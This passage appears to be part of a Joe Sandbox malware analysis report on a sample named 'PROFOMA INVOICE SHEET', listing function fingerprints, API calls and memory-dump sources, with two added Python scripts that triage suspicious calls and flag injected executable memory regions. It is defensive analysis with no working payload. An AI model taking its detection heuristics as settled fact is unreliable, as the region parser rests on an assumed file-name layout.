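            notes.append("AdjustTokenPrivileges at %08X: token privileges changed" % c["ref"])
    return {"tags": tags, "notes": notes, "refs": [c["ref"] for c in func["calls"]]}


def suspicious_functions(text, watch=("blocks_user_input",
                                      "modifies_token_privileges",
                                      "replaces_exception_filter")):
    """Return (address of first call, tags) for functions hitting the watch list."""
    hits = []
    for f in parse_report(text):
        t = triage(f)
        if any(tag in t["tags"] for tag in watch):
            hits.append((t["refs"][0], t["tags"]))
    return hits


if __name__ == "__main__":
    for ref, tags in suspicious_functions(REPORT_EXCERPT):
        print("%08X  %s" % (ref, ", ".join(tags)))
```

The `ref` addresses are what you pivot on: they are the call sites inside the `0x300000` image dump listed as the memory dump source, so each hit can be opened directly in the `.jbxd` snapshot or in the dumped PE. Only the first argument of BlockInput and of the other decoded calls is trusted; the trailing `?` entries are stack contents the plugin could not resolve and the script leaves them alone.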
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                    • Instruction ID: b4374c22cb32b19c6bf8b162b8b18559e7cdcf86c5110e074fe264bb7176ce1a
                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                    • Instruction Fuzzy Hash: 2A51557160C7795BDB3B8678B85F7FE2389BB02340F190509E982DB682CB25DE81D356
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0&=
                                    • API String ID: 0-1084027831
                                    • Opcode ID: 281c521f86069f9e0b838fd26535bba73419b264b673acfa666183de28156e37
                                    • Instruction ID: b349e7c7eee93808b61cdb238264b4798fe5b9abd916e974ffc502e6c7a0e107
                                    • Opcode Fuzzy Hash: 281c521f86069f9e0b838fd26535bba73419b264b673acfa666183de28156e37
                                    • Instruction Fuzzy Hash: 1421D8326216118BD728CF79D81367F73E9A764310F198A2EE4A7C73D0DE39A904CB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 01db3655a91c7217887256aa444c3d0d08939edcb75296a260002984f025049a
                                    • Instruction ID: 37ea87f34e2ded5eac539506ef73e991fe197e3764f928e790658fb68f3b79e0
                                    • Opcode Fuzzy Hash: 01db3655a91c7217887256aa444c3d0d08939edcb75296a260002984f025049a
                                    • Instruction Fuzzy Hash: 05322162D29F014DD7279638C862336A64DAFB73C5F15D727E82AB5DAAEB29C4C34100
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e8dca4889f748937262fbbcc511050cb9d6726c4427e5f9eab523d72d34b4ada
                                    • Instruction ID: a2c7061f74ca90d0e2711d9ef97c16bdee04cf062ae69de061327cf77ea2d976
                                    • Opcode Fuzzy Hash: e8dca4889f748937262fbbcc511050cb9d6726c4427e5f9eab523d72d34b4ada
                                    • Instruction Fuzzy Hash: C5322D31A203058FCF2BCA68C490DBD7BA5EB49709F2AA566DC45D76A1D330DD8ADB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a32faf88c5a7f614e15729b43561e79eb913dadd86ad899b1491f090668f39e
                                    • Instruction ID: 6adf42c708d51690759eead65aa58cdc3541c34ab757ff54153362085584c816
                                    • Opcode Fuzzy Hash: 0a32faf88c5a7f614e15729b43561e79eb913dadd86ad899b1491f090668f39e
                                    • Instruction Fuzzy Hash: 1D22C070E04609DFDF16CFA4D891AAEB7F5FF48300F144629E812AB292EB35AD55CB50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e156f25ab105d497d338c40867b6c24880bad88b1b478c5359f17b9b6b08fa45
                                    • Instruction ID: 41566a60ea4c59a57e518e05e928cb28025be163aa1ae3b68bafd62c2e2bafe4
                                    • Opcode Fuzzy Hash: e156f25ab105d497d338c40867b6c24880bad88b1b478c5359f17b9b6b08fa45
                                    • Instruction Fuzzy Hash: 300293B1E00209EFDB06DF54D891AAEB7F5FF44300F118569E8169F291EB31AE64CB91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                    • Instruction ID: d2d895a4fb6b4dc88b63e5c1d7e9173a9354e397f34598df62b1fde0f7d04f5b
                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                    • Instruction Fuzzy Hash: 7C9197726080B34ADB2B463EA63403EFFE15AA23A131B079DD4F2CB1C5FE24D954D660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                    • Instruction ID: cdfffd0d16e4104e92ad83c26e6ed58af375ca6bb8e94ff2e9b1150423d81676
                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                    • Instruction Fuzzy Hash: B59152722090F34ADB2F467AA67403EFFF55AA23A131B07AED4F2CA5C1FE14C5549660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1101109a7aca6c9240b86a5b81b5346692892cd0f00aa9bf77a7222c6507b4f3
                                    • Instruction ID: 683b7e5de93f255f7601935125c21fb50d8e2f32e7e969293fcbb933843222c4
                                    • Opcode Fuzzy Hash: 1101109a7aca6c9240b86a5b81b5346692892cd0f00aa9bf77a7222c6507b4f3
                                    • Instruction Fuzzy Hash: 6F61687120C77996DF3B9A28BC96BBE2398FF41710F11091AE843DF781DA119E42C355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae775686523cefaf716bc709e2bb84fe581747dc68f5c49cb4b06459e5ea2702
                                    • Instruction ID: d9661aac4ecbb6ee0410f47976dc7c6aa92af88d001bdb6b3853dce5ca5d80a6
                                    • Opcode Fuzzy Hash: ae775686523cefaf716bc709e2bb84fe581747dc68f5c49cb4b06459e5ea2702
                                    • Instruction Fuzzy Hash: 6C61AD3520873957DF3B5A287852BBF2388FF42740F120959E943DF681DA12ED428365
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                    • Instruction ID: 6d0693dcb4783f3cd85170f81342071bac836eb06b52e045c50b9b4fa5a7a3e2
                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                    • Instruction Fuzzy Hash: 938185726080B309DB6F423EA67403EFFE15AA23A131B079DD4F2CB5C5EE24C554E660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8a53085bc295b849a9050b6e65794725728741d28835c6b98db788da6aee984
                                    • Instruction ID: 0ac7302879e4afacf8134b458c833bc9db2ba702d8ffc65adcc78167a7564daf
                                    • Opcode Fuzzy Hash: d8a53085bc295b849a9050b6e65794725728741d28835c6b98db788da6aee984
                                    • Instruction Fuzzy Hash: 266134B69193C09FC727CF2494A4512BFF1EF12355B1A48EFC8869B992D330E94ACB01
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 99dcb2b027e5e403e2e1ff1428987586896595542bd92bb0d1330d272dd58002
                                    • Instruction ID: 53741db1206e38c65ea082beb1c2ba17cc6884064e02db2bf03592865480a10b
                                    • Opcode Fuzzy Hash: 99dcb2b027e5e403e2e1ff1428987586896595542bd92bb0d1330d272dd58002
                                    • Instruction Fuzzy Hash: 1B41B6E29AEBD24FC31397786C791417F70AE2714934E4AEFC081A74D7E694410ACB8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction ID: de9bf21100126a1a1e50c2fe06beccc3fe52637d8f6182efb6b2a7d4d8564944
                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction Fuzzy Hash: D741A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction ID: 254f4d523222baaa3c24bf75d1666598403ee6e8cef472cf0734ae96e7fd6982
                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction Fuzzy Hash: E601A479A10209EFCB48DF98C5909AEF7F9FF48310F208599D90AA7301D730AE41DB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction ID: d1dfa8f133f18bc033496ea8d0ecad097732ac5258fe420c6e2cc05a1cf3012c
                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction Fuzzy Hash: 3C019279A10209EFCB48DF98C5909AEF7B9FF48710F208599D81AA7341D730AE41DB94
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
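The Source File names above say where each function block was dumped from: the blocks so far come either from the image-backed region at 00300000 (based on PE: true) or from the region at 03DB9000 (based on PE: false). The following is an added Python example, not part of the Joe Sandbox report, that parses those names and flags regions which are executable but neither image-backed nor carrying a PE header, the footprint an analyst looks for when a sample is reported as writing to foreign memory. The field layout (process index, run, timestamp, base address, page protection, an undecoded field, MEMORY_BASIC_INFORMATION type, sequence number) is an assumption inferred from the two names visible in this report; the PAGE_* and MEM_* values are the documented Win32 constants, and the two sample lines are copied from the report.

```python
"""Flag injected-code regions from Joe Sandbox "Source File" names.

Added example, not part of the Joe Sandbox report. ASSUMPTION: the dotted
.sdmp name is read as
  <proc>.<run>.<timestamp>.<base>.<protect>.<field6>.<type>.<seq>.sdmp
where <protect> is the Win32 page protection and <type> the
MEMORY_BASIC_INFORMATION.Type value; <field6> is not decoded here.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Documented winnt.h values.
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
EXEC_PROTECTS = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITE_PROTECTS = {0x04, 0x08, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
PROTECT_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                 0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed layout of the .sdmp name (see module docstring).
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.sdmp.*?based on PE:\s*(?P<pe>true|false)"
)


@dataclass(frozen=True)
class Region:
    proc: int
    base: int
    protect: int
    mem_type: int
    pe_backed: bool

    @property
    def executable(self) -> bool:
        # PAGE_GUARD / PAGE_NOCACHE modifiers live above the low byte.
        return (self.protect & 0xFF) in EXEC_PROTECTS

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in WRITE_PROTECTS

    @property
    def suspicious(self) -> bool:
        """Executable memory that is not an image mapping and has no PE header:
        the shape of code written into a process rather than loaded by it."""
        return self.executable and self.mem_type != MEM_IMAGE and not self.pe_backed


def parse_region(line: str) -> Optional[Region]:
    m = SOURCE_RE.search(line)
    if not m:
        return None
    return Region(int(m["proc"], 16), int(m["base"], 16), int(m["protect"], 16),
                  int(m["mtype"], 16), m["pe"] == "true")


def describe(r: Region) -> str:
    return (f"proc={r.proc} base=0x{r.base:08X} "
            f"{PROTECT_NAMES.get(r.protect & 0xFF, hex(r.protect))} "
            f"{TYPE_NAMES.get(r.mem_type, hex(r.mem_type))} "
            f"pe_backed={r.pe_backed} suspicious={r.suspicious}")


def triage(lines: Iterable[str]) -> List[Region]:
    """Suspicious regions, deduplicated by base address (blocks repeat the same source)."""
    seen = {}
    for line in lines:
        r = parse_region(line)
        if r and r.suspicious and r.base not in seen:
            seen[r.base] = r
    return list(seen.values())


# Sample input: the two Source File lines that occur in this report.
REPORT_LINES = [
    "• Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true",
    "• Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false",
]

if __name__ == "__main__":
    for line in REPORT_LINES:
        print(describe(parse_region(line)))
```

Run against the two names, the image-backed .text region at 00301000 decodes as PAGE_EXECUTE_READ / MEM_IMAGE and is left alone, while the region at 03DB9000 decodes as PAGE_EXECUTE_READWRITE / MEM_PRIVATE with no PE header and is the one to carve and scan.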
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00382B30
                                    • DeleteObject.GDI32(00000000), ref: 00382B43
                                    • DestroyWindow.USER32 ref: 00382B52
                                    • GetDesktopWindow.USER32 ref: 00382B6D
                                    • GetWindowRect.USER32(00000000), ref: 00382B74
                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00382CA3
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00382CB1
                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382CF8
                                    • GetClientRect.USER32(00000000,?), ref: 00382D04
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00382D40
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D62
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D75
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D80
                                    • GlobalLock.KERNEL32(00000000), ref: 00382D89
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D98
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00382DA1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382DA8
                                    • GlobalFree.KERNEL32(00000000), ref: 00382DB3
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382DC5
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0039FC38,00000000), ref: 00382DDB
                                    • GlobalFree.KERNEL32(00000000), ref: 00382DEB
                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00382E11
                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00382E30
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382E52
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0038303F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 3c16c57cea9fcc2a3d9aeb2f9d981a021ca6733894dcbd023b7a140ae52f073b
                                    • Instruction ID: 1317ba23ecc63c8eaf068c5d1384e418954e36dfbe63b820c1ea9d3d621f405f
                                    • Opcode Fuzzy Hash: 3c16c57cea9fcc2a3d9aeb2f9d981a021ca6733894dcbd023b7a140ae52f073b
